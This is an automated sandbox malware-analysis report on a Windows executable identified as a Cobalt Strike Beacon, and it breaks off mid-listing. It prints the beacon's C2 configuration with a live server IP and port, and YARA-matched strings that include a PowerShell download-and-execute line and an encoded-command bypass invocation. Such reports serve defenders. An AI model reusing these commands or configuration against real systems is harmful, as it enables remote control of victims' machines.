Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
121.exe

Overview

General Information

Sample name:121.exe
Analysis ID:1581040
MD5:3b8f4ae6dd1ef9625f8ba8f6c9eb8515
SHA1:d3dbc4f0348dce6c99dba536f8e86deb707be6ab
SHA256:f3ea334bb3adf2fabae612dd6155d15a05e5e1998a1d9d7b326e42ac4291c57e
Tags:CobaltStrikeexeuser-sicehicetf
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 121.exe (PID: 5000 cmdline: "C:\Users\user\Desktop\121.exe" MD5: 3B8F4AE6DD1EF9625F8BA8F6C9EB8515)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 60421, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "152.42.226.16,/ca", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
    00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
      00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
        00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
          00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
          • 0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
          • 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
          • 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes!
          • 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
          • 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
          • 0x3136a:$a11: Could not open service control manager on %s: %d
          • 0x3189c:$a12: %d is an x64 process (can't inject x86 content)
          • 0x318cc:$a13: %d is an x86 process (can't inject x64 content)
          • 0x31bed:$a14: Failed to impersonate logged on user %d (%u)
          • 0x31855:$a15: could not create remote thread in %d: %d
          • 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x31803:$a17: could not write to process memory: %d
          • 0x3139b:$a18: Could not create service %s on %s: %d
          • 0x31424:$a19: Could not delete service %s on %s: %d
          • 0x31289:$a20: Could not open process token: %d (%u)
          Click to see the 28 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.121.exe.ce0000.2.raw.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
            0.2.121.exe.ce0000.2.raw.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
              0.2.121.exe.ce0000.2.raw.unpackWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
              • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
              • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
              • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
              • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
              • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
              • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
              • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
              • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
              • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
              • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
              • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
              • 0x32d6a:$a11: Could not open service control manager on %s: %d
              • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
              • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
              • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
              • 0x33255:$a15: could not create remote thread in %d: %d
              • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
              • 0x33203:$a17: could not write to process memory: %d
              • 0x32d9b:$a18: Could not create service %s on %s: %d
              • 0x32e24:$a19: Could not delete service %s on %s: %d
              • 0x32c89:$a20: Could not open process token: %d (%u)
              0.2.121.exe.ce0000.2.raw.unpackWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
              • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
              0.2.121.exe.ce0000.2.raw.unpackWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
              • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
              • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
              Click to see the 40 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-26T19:28:01.673606+010020287653Unknown Traffic192.168.2.549704152.42.226.1660421TCP
              2024-12-26T19:28:07.561196+010020287653Unknown Traffic192.168.2.549707152.42.226.1660421TCP
              2024-12-26T19:28:13.409204+010020287653Unknown Traffic192.168.2.549710152.42.226.1660421TCP
              2024-12-26T19:28:19.377507+010020287653Unknown Traffic192.168.2.549715152.42.226.1660421TCP
              2024-12-26T19:28:25.256835+010020287653Unknown Traffic192.168.2.549727152.42.226.1660421TCP
              2024-12-26T19:28:31.327154+010020287653Unknown Traffic192.168.2.549744152.42.226.1660421TCP
              2024-12-26T19:28:37.157879+010020287653Unknown Traffic192.168.2.549758152.42.226.1660421TCP
              2024-12-26T19:28:43.783419+010020287653Unknown Traffic192.168.2.549775152.42.226.1660421TCP
              2024-12-26T19:28:49.678477+010020287653Unknown Traffic192.168.2.549789152.42.226.1660421TCP
              2024-12-26T19:28:55.588585+010020287653Unknown Traffic192.168.2.549802152.42.226.1660421TCP
              2024-12-26T19:29:01.456300+010020287653Unknown Traffic192.168.2.549821152.42.226.1660421TCP
              2024-12-26T19:29:07.535213+010020287653Unknown Traffic192.168.2.549833152.42.226.1660421TCP
              2024-12-26T19:29:14.096183+010020287653Unknown Traffic192.168.2.549850152.42.226.1660421TCP
              2024-12-26T19:29:19.931428+010020287653Unknown Traffic192.168.2.549864152.42.226.1660421TCP
              2024-12-26T19:29:26.206541+010020287653Unknown Traffic192.168.2.549877152.42.226.1660421TCP
              2024-12-26T19:29:32.159250+010020287653Unknown Traffic192.168.2.549894152.42.226.1660421TCP
              2024-12-26T19:29:38.062491+010020287653Unknown Traffic192.168.2.549908152.42.226.1660421TCP
              2024-12-26T19:29:44.081306+010020287653Unknown Traffic192.168.2.549926152.42.226.1660421TCP
              2024-12-26T19:29:49.995684+010020287653Unknown Traffic192.168.2.549942152.42.226.1660421TCP
              2024-12-26T19:29:55.909580+010020287653Unknown Traffic192.168.2.549957152.42.226.1660421TCP
              2024-12-26T19:30:01.910442+010020287653Unknown Traffic192.168.2.549974152.42.226.1660421TCP
              2024-12-26T19:30:07.860082+010020287653Unknown Traffic192.168.2.549988152.42.226.1660421TCP
              2024-12-26T19:30:13.817298+010020287653Unknown Traffic192.168.2.550005152.42.226.1660421TCP
              2024-12-26T19:30:19.803151+010020287653Unknown Traffic192.168.2.550019152.42.226.1660421TCP
              2024-12-26T19:30:25.829058+010020287653Unknown Traffic192.168.2.550035152.42.226.1660421TCP
              2024-12-26T19:30:31.881327+010020287653Unknown Traffic192.168.2.550049152.42.226.1660421TCP
              2024-12-26T19:30:37.723474+010020287653Unknown Traffic192.168.2.550054152.42.226.1660421TCP
              2024-12-26T19:30:43.582932+010020287653Unknown Traffic192.168.2.550057152.42.226.1660421TCP
              2024-12-26T19:30:49.464020+010020287653Unknown Traffic192.168.2.550060152.42.226.1660421TCP
              2024-12-26T19:30:55.445758+010020287653Unknown Traffic192.168.2.550063152.42.226.1660421TCP
              2024-12-26T19:31:01.288625+010020287653Unknown Traffic192.168.2.550066152.42.226.1660421TCP
              2024-12-26T19:31:07.098896+010020287653Unknown Traffic192.168.2.550069152.42.226.1660421TCP
              2024-12-26T19:31:13.399828+010020287653Unknown Traffic192.168.2.550072152.42.226.1660421TCP
              2024-12-26T19:31:19.241638+010020287653Unknown Traffic192.168.2.550075152.42.226.1660421TCP
              2024-12-26T19:31:25.037680+010020287653Unknown Traffic192.168.2.550078152.42.226.1660421TCP
              2024-12-26T19:31:30.865630+010020287653Unknown Traffic192.168.2.550081152.42.226.1660421TCP
              2024-12-26T19:31:36.927590+010020287653Unknown Traffic192.168.2.550084152.42.226.1660421TCP
              2024-12-26T19:31:42.740586+010020287653Unknown Traffic192.168.2.550087152.42.226.1660421TCP
              2024-12-26T19:31:48.599640+010020287653Unknown Traffic192.168.2.550090152.42.226.1660421TCP
              2024-12-26T19:31:54.641776+010020287653Unknown Traffic192.168.2.550093152.42.226.1660421TCP
              2024-12-26T19:32:00.493646+010020287653Unknown Traffic192.168.2.550096152.42.226.1660421TCP
              2024-12-26T19:32:06.302485+010020287653Unknown Traffic192.168.2.550099152.42.226.1660421TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 121.exeAvira: detected
              Found malware configuration
              Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 60421, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "152.42.226.16,/ca", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
              Multi AV Scanner detection for submitted file
              Source: 121.exeReversingLabs: Detection: 86%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: 121.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CE1184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00CE1184
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_00CF9220
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00CF1C30
              Source: C:\Users\user\Desktop\121.exeCode function: 4x nop then sub rsp, 28h0_2_00402314

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 152.42.226.16
              Connects to many ports of the same IP (likely port scanning)
              Source: global trafficTCP traffic: 152.42.226.16 ports 0,1,2,4,6,60421
              Source: global trafficTCP traffic: 192.168.2.5:49704 -> 152.42.226.16:60421
              Source: Joe Sandbox ViewASN Name: NCRENUS NCRENUS
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49707 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49715 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49704 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49744 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49710 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49789 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49775 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49758 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49877 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49894 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49850 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49942 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49957 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49908 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49821 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49974 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49988 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50019 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49802 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49864 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50035 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50049 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50057 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50063 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50054 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50069 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50072 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50081 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50078 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50075 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50093 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50099 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50066 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50087 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50084 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50060 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49727 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49833 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50090 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50096 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49926 -> 152.42.226.16:60421
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50005 -> 152.42.226.16:60421
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CEE68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_00CEE68C
              Source: 121.exe, 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
              Source: 121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16/
              Source: 121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16/8
              Source: 121.exe, 00000000.00000003.2726578993.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2364494903.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2607132749.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2548055513.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2517825725.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2758216720.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3151184537.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3477221868.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2245055221.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3210323568.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2665805385.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3329829025.0000000000127000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2635387413.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3238480994.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 